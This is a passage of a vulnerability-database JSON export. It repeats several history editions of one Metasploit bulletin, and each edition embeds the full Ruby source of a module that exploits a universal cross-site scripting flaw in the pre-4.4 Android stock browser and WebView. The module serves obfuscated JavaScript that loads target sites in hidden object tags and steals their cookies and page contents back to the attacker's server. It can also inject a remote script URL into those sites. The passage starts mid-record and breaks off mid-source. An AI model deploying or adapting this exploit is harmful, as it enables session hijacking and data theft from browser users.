x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-10-27T01:39:40", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-19T04:01:20", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-19T04:01:20"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-19T04:01:20", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-19T06:02:43", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-19T06:02:43"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-19T06:02:43", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T06:02:24", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-20T06:02:24"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-20T06:02:24", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T08:01:52", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-01-20T08:01:52"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-20T08:01:52", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-26T08:57:12", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-02-26T08:57:12"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-02-26T08:57:12", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-26T10:53:29", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-02-26T10:53:29"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n 